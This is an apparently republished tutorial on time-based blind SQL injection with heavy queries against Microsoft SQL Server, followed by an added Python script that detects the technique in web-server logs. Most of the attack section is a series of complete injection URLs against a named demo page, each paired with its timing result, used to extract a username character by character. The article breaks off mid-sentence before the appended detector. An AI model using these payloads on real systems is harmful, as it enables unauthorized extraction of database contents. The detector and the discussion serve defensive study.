
Time-Based Blind SQL Injection Technique Using Heavy Queries

Author: Anonymous  Source: 翔宇亭IT乐园  Published: 2018-12-31 12:31:23

procedures and Benchmark functions is cancelled, could we generate a time-based blind SQL injection method?

The answer is yes. Blind SQL injection exploits can only be avoided by using the right programming technique, or, in Michael Howard’s words, “All input is evil until proven otherwise.”

A simple way to generate time delays is to take advantage of one of the biggest database problems, the one that made performance-tuning techniques necessary in the first place: heavy queries. All you need to generate a time delay is to access a table that has some records and to build a query that forces the engine to work hard. In other words, we need to build a query that ignores everything the performance best practices recommend.

In this example we have a URL with a SQL injection vulnerability that can be exploited only by a time-based blind SQL injection. This means that the system produces no error message, and we always obtain the same response (sometimes because the query is correct and sometimes because the programmer returns that value as a default).

Figure 1: Error condition. The programmer returns a default value -> Result 1

Example 1: Microsoft SQL Server. Exploitation with Heavy queries:

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

Figure 2: Positive result. The condition is true, and the response has a delay of 14 seconds.

As we can see in Figure 2, the query starts at 23:49:11 and ends at 23:49:25 -- 14 seconds. This delay is caused by the third condition in the “where” clause: when it is TRUE, that is, when “300>(select top 1 ascii(substring(name,1,1)) from sysusers)” holds, the heavy query also has to be evaluated. We therefore know that the ASCII value of the first letter of the first username in the sysusers table is lower than 300.

Figure 3: Negative Result. One-second response delay

As we can see in Figure 3, the query starts at 00:00:28 and ends at 00:00:29 -- one second. This time the third condition in the “where” clause is FALSE: “0>(select top 1 ascii(substring(name,1,1)) from sysusers)” does not hold, so the heavy query is skipped and the response is fast. We therefore know that the ASCII value of the first letter of the first username in the sysusers table is higher than 0.

With these two queries we can access all the information stored in the database by measuring the time. The main idea is that when the third condition in the query is FALSE, the database engine stops processing the second condition, because with one FALSE value in a query built with “and” operators the result will be FALSE. Therefore the database engine doesn’t have to process the heavy query (second condition). So, if we want to know the exact value of the stored username, we have to move the comparison value step by step and measure the response time:

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 0 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 100 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 110 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 120 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 14 seconds → TRUE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 115 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 118 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 119 >(select top 1 ascii(substring(name,1,1)) from sysusers) → 1 second → FALSE

Then the result is ASCII(119)=’
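From the defensive side, the timing behaviour described above is itself a detection signal. The following Python script is added here as an example and is not part of the original article: it scans constructed web-server log lines for the two traits of this technique, a table cross-joined with itself under several aliases, and response times that fall into two widely separated clusters while only the comparison constant changes. The log format (response time as the last field), the thresholds and the sample client addresses are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Same table aliased twice in a row in a FROM list ("sysusers AS sys1, sysusers as sys2"):
# the self-cross-join that makes the query heavy. Any table name is accepted.
SELF_JOIN = re.compile(r"\b(\w+)\s+as\s+\w+\s*,\s*\1\s+as\s+\w+", re.IGNORECASE)
# The guarding comparison against a one-character scalar subquery (the bisection probe).
CHAR_PROBE = re.compile(r"\d+\s*>\s*\(\s*select\s+top\s+1\s+ascii\s*\(\s*substring", re.IGNORECASE)
# Combined-log-style line whose last field is the response time in seconds (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \d+ ([\d.]+)$')

def heavy_query_score(query):
    """Adjacent self-joins in the URL-decoded query, plus 1 if a char probe is present."""
    q = unquote_plus(query)
    return len(SELF_JOIN.findall(q)) + (1 if CHAR_PROBE.search(q) else 0)

def analyze(lines, min_probes=3, ratio=5.0):
    """Flag a client+path whose heavy-query requests show two clearly separated timings."""
    per_client = defaultdict(list)
    for m in filter(None, map(LOG_RE.match, lines)):  # unparsable lines are skipped
        client, target, secs = m.group(1), m.group(2), float(m.group(4))
        path, _, query = target.partition("?")
        if heavy_query_score(query) >= 2:
            per_client[(client, path)].append(secs)
    findings = []
    for (client, path), times in per_client.items():
        slow, fast = max(times), min(times)
        if len(times) < min_probes or fast <= 0 or slow / fast < ratio:
            continue
        cut = (slow + fast) / 2  # separates TRUE-branch (heavy query ran) from FALSE-branch timings
        findings.append({"client": client, "path": path, "probes": len(times),
                         "slow_probes": sum(t >= cut for t in times),
                         "fast_probes": sum(t < cut for t in times)})
    return findings

def _log(client, ts, query, secs):  # one constructed log line, query percent-encoded as logged
    return f'{client} - - [{ts}] "GET /blind2/pista.aspx?{quote(query)} HTTP/1.1" 200 512 {secs}'

# Constructed sample log (not from the original page): the article's probe series with a
# 4-way self-join; only the comparison constant changes, the response time is ~14 s or ~1 s.
PROBE = ("id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, "
         "sysusers AS sys4)>1 and {}>(select top 1 ascii(substring(name,1,1)) from sysusers)")
SAMPLE_LOG = [
    _log("10.0.0.5", "31/Dec/2018:23:48:50 +0000", "id_pista=1", 0.8),
    _log("10.0.0.5", "31/Dec/2018:23:49:11 +0000", PROBE.format(300), 14.0),
    _log("10.0.0.5", "31/Dec/2018:23:50:28 +0000", PROBE.format(0), 1.0),
    _log("10.0.0.5", "31/Dec/2018:23:52:19 +0000", PROBE.format(120), 14.2),
    _log("10.0.0.5", "31/Dec/2018:23:53:01 +0000", PROBE.format(119), 0.9),
]
```

Running `analyze(SAMPLE_LOG)` reports one finding for 10.0.0.5 on /blind2/pista.aspx with four probes split evenly between the slow and fast clusters; the plain `id_pista=1` request scores 0 and is ignored.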
